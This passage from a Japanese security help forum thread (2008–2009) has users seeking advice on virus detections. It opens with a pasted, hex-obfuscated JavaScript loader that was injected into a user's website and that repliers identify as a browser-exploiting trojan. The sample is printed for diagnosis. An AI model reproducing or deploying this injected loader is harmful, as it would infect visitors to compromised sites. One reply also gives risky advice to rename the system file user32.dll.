{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
223:名無しさん@お腹いっぱい。
08/12/14 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
224:名無しさん@お腹いっぱい。
08/12/14 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
URLリンク(vil.nai.com)
Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
225:名無しさん@お腹いっぱい。
08/12/14 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。
226:名無しさん@お腹いっぱい。
08/12/14 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
227:221
08/12/15 03:26:54
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
228: ◆N9P3SuvBPo
08/12/15 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
229:名無しさん@お腹いっぱい。
08/12/15 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
230:221
08/12/15 20:19:42
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
231:名無しさん@お腹いっぱい。
08/12/15 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
232:名無しさん@お腹いっぱい。
08/12/15 20:54:04
>>231
URLリンク(detail.chiebukuro.yahoo.co.jp)
233:名無しさん@お腹いっぱい。
08/12/15 21:07:59
>>231
avast! Anti-Virus Part99
スレリンク(sec板:30-番)
234:名無しさん@お腹いっぱい。
08/12/15 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
235:名無しさん@お腹いっぱい。
08/12/15 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください
236:名無しさん@お腹いっぱい。
08/12/17 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
237:名無しさん@お腹いっぱい。
08/12/17 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
238:名無しさん@お腹いっぱい。
08/12/17 21:34:56
バスタースレでどうぞ!
239:名無しさん@お腹いっぱい。
08/12/18 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
240:名無しさん@お腹いっぱい。
08/12/18 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
241:名無しさん@お腹いっぱい。
08/12/19 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
URLリンク(detail.chiebukuro.yahoo.co.jp)
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
242:名無しさん@お腹いっぱい。
08/12/19 12:43:31
>>241
スレリンク(sec板)
243:名無しさん@お腹いっぱい。
08/12/19 21:40:56
>>239
URLリンク(www.trendmicro.co.jp)
244:名無しさん@お腹いっぱい。
08/12/19 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
245:名無しさん@お腹いっぱい。
08/12/19 23:30:43
>>244
URLリンク(drweb.jp)
インストール不要
246:名無しさん@お腹いっぱい。
08/12/20 05:46:34
>>241
システムの復元を無効にする
URLリンク(www.mcafee.com)
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
247:名無しさん@お腹いっぱい。
08/12/20 19:47:45
>>245
ありがとうございました。
248:241
08/12/21 01:08:37
>>244
ありがとうございます。
試してみます。
249:名無しさん@お腹いっぱい。
08/12/22 19:38:14
けっこうおもしろかった
URLリンク(www.interbars.co.jp)
250:名無しさん@お腹いっぱい。
08/12/22 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
251:名無しさん@お腹いっぱい。
08/12/22 22:02:25
逆汗するならともかくツール2~3個拾うだけならプロとは言わんよ
252:名無しさん@お腹いっぱい。
08/12/22 22:27:34
>>250
同意
いかにrootkitがやっかいなモノかが分かる
253:名無しさん@お腹いっぱい。
08/12/22 23:32:30
a
254:名無しさん@お腹いっぱい。
08/12/22 23:46:21
本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
255:名無しさん@お腹いっぱい。
08/12/23 00:03:57
そりゃ困った社員がウイルス付きPCをLANに繋いだからだろ
256:名無しさん@お腹いっぱい。
08/12/23 00:26:34
【使用OS】WinXP Home edition Version2002 Service Pack3
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
257:名無しさん@お腹いっぱい。
08/12/23 00:30:41
第2段階
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
URLリンク(www.microsoft.com)
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
URLリンク(www.microsoft.com)
一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
258:名無しさん@お腹いっぱい。
08/12/23 00:39:23
削除したのに出ました。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
259: ◆N9P3SuvBPo
08/12/23 00:49:46
>252
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
260:名無しさん@お腹いっぱい。
08/12/23 00:56:00
>>259
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
261:名無しさん@お腹いっぱい。
08/12/23 02:34:12
>>260
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
262:名無しさん@お腹いっぱい。
08/12/23 18:17:05
ADWBJC?なんたらのウイルスにより、インターネットアクセスできません。手動で削除してくれと書いてますが、どうすれば…わかる方いますか?
263:名無しさん@お腹いっぱい。
08/12/23 19:38:09
>>262
>>1
俺たちはエスパーではない
264:名無しさん@お腹いっぱい。
08/12/23 22:03:02
>>261
FWを無効にするものもあるんですか・・・
この機会に何か入れたいと思います
265:名無しさん@お腹いっぱい。
08/12/27 09:41:43
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
266:名無しさん@お腹いっぱい。
08/12/27 09:46:58
211 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/27(土) 09:14:13
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
267:名無しさん@お腹いっぱい。
08/12/27 20:22:58
すでに廃業しているコムスンの公式HPを閲覧すると
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
【感染する疑いのあるサイト⇒】URLリンク(www.comsn.c) o m
268: ◆N9P3SuvBPo
08/12/27 20:58:13
>267
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
269:名無しさん@お腹いっぱい。
08/12/28 02:05:34
>>267
アグスによる調査結果(事業閉鎖の案内は確認できる)
URLリンク(www.aguse.jp)
該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
URLリンク(www.virustotal.com)
検出された、トロイの木馬の説明(以下説明の新種と思われる)
URLリンク(www.f-secure.co.jp)
サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
270:名無しさん@お腹いっぱい。
08/12/28 04:12:07
デコードしてみたけど、何も無かった。
271:名無しさん@お腹いっぱい。
08/12/28 20:26:42
なんだなんだ。
272:名無しさん@お腹いっぱい。
08/12/30 00:22:18
>>269
>>270
ご対応ありがとうございます。
しかし宣伝するわけではないけどアンチウィルスソフト
(Win Live OneCare)が検出してくれて助かった。
273:名無しさん@お腹いっぱい。
08/12/30 02:42:46
【使用OS】 「XPホームエディション」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
274:名無しさん@お腹いっぱい。
08/12/30 03:01:20
>>273
スレリンク(sec板)
スレリンク(sec板)
275:名無しさん@お腹いっぱい。
08/12/30 22:05:09
【使用OS】 「XP Home sp2」
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
276: ◆N9P3SuvBPo
08/12/30 23:38:23
>275
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
URLリンク(www.virustotal.com)
277:名無しさん@お腹いっぱい。
08/12/30 23:52:51
>>276
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
278: ◆N9P3SuvBPo
08/12/30 23:59:17
>277
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
279:名無しさん@お腹いっぱい。
08/12/31 00:05:40
>>278
サイズは
574,976 バイト
ディスク上のサイズは
574,536 バイト
ってなってました
280: ◆N9P3SuvBPo
08/12/31 00:21:34
>279
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
281:名無しさん@お腹いっぱい。
08/12/31 01:23:42
>>280
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
URLリンク(www.e-kuraberu.net)
282:名無しさん@お腹いっぱい。
08/12/31 01:34:58
あっ281のパス忘れてた 4109です
283: ◆N9P3SuvBPo
08/12/31 02:54:50
>281
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
284:名無しさん@お腹いっぱい。
08/12/31 05:30:32
URLリンク(dropfile.freehostia.com)
バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
285:名無しさん@お腹いっぱい。
08/12/31 05:59:57
>>284
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
286:名無しさん@お腹いっぱい。
08/12/31 06:08:01
スレ違いすいませんでした
よくわかりました、ありがとうございました
287:名無しさん@お腹いっぱい。
08/12/31 12:39:30
>>283
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
288: ◆N9P3SuvBPo
08/12/31 13:11:14
>287
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
289:名無しさん@お腹いっぱい。
09/01/04 23:19:56
テンプレ使用ご容赦下さい
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
290:名無しさん@お腹いっぱい。
09/01/04 23:43:39
キンタマ、山田ウイルスは板違い。
てかマルチ市ね。
291:名無しさん@お腹いっぱい。
09/01/05 02:19:26
>>289
>>92
292:名無しさん@お腹いっぱい。
09/01/07 00:21:16
【使用OS】 「WINDOWSXP」
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
293:名無しさん@お腹いっぱい。
09/01/07 00:26:44
今また検索してみたらDoubleClickとAdvertisingとかいうのも増えちゃってますが・・・
やばいですかね?;
294:名無しさん@お腹いっぱい。
09/01/07 00:48:58
全部cookieを利用したスパイウェア。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
295:名無しさん@お腹いっぱい。
09/01/07 08:14:09
了解です!
296:名無しさん@お腹いっぱい。
09/01/07 18:34:19
TrackingCookieはスパイウエアじゃねえが・・・・・・
297:名無しさん@お腹いっぱい。
09/01/07 20:55:23
【使用OS】 「xp pro sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
298:名無しさん@お腹いっぱい。
09/01/07 21:32:56
>>297
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
299:名無しさん@お腹いっぱい。
09/01/07 21:47:59
個人情報が入っているファイルがあって、それはWinRARでパスワードを掛けて圧縮していて
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
300:名無しさん@お腹いっぱい。
09/01/07 22:33:25
すみません、テンプレ読んでませんでした。
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
301:名無しさん@お腹いっぱい。
09/01/07 22:33:56
299=300です
302:名無しさん@お腹いっぱい。
09/01/08 23:44:00
trdhost.exe とは何者でしょうか?rdhost.exeではなく tdrhost.exeでした。
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1~3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
303: ◆N9P3SuvBPo
09/01/09 01:00:29
>302
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
304:名無しさん@お腹いっぱい。
09/01/09 01:45:51
tdrなのかtrdなのか
305:302
09/01/09 01:54:51
>>303-304 trdです。C:\WINDOWS\Prefetch 内に TRDHOST.EXE-2EAF3965.pf がありましたが,本体とおぼしき物は見つかりませんでした。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
306:名無しさん@お腹いっぱい。
09/01/09 13:25:36
>>297
自分もウイルスバスターで同じものでました。
一週間前にスキャンして終了してから初起動した時に検出されたんで誤検知を疑ってます。
307:名無しさん@お腹いっぱい。
09/01/09 19:08:09
>>299
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
308:302
09/01/10 00:15:20
Windows/system32/trdhost.exe が犯人だと分かりましたが,System32フォルダを覗いてもそれはありませんでした。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
309:名無しさん@お腹いっぱい。
09/01/10 00:29:32
ファイルとレジストリは隠すのに、プロセスを隠さないルートキットなんてあるの?
310:名無しさん@お腹いっぱい。
09/01/10 00:41:32
間抜けなルートキットなんだろ
SafeModeで見えますとかまれによくある
311:名無しさん@お腹いっぱい。
09/01/10 00:50:15
> まれによくある
どっちだよw
とりあえず、>>308はルートキットスキャナを使ってみた方がいいな。
312:名無しさん@お腹いっぱい。
09/01/10 17:25:04
>>297
それ私も検知されました。
一週間前に検索したところ、反応なかったのですが…
今は隔離させています。
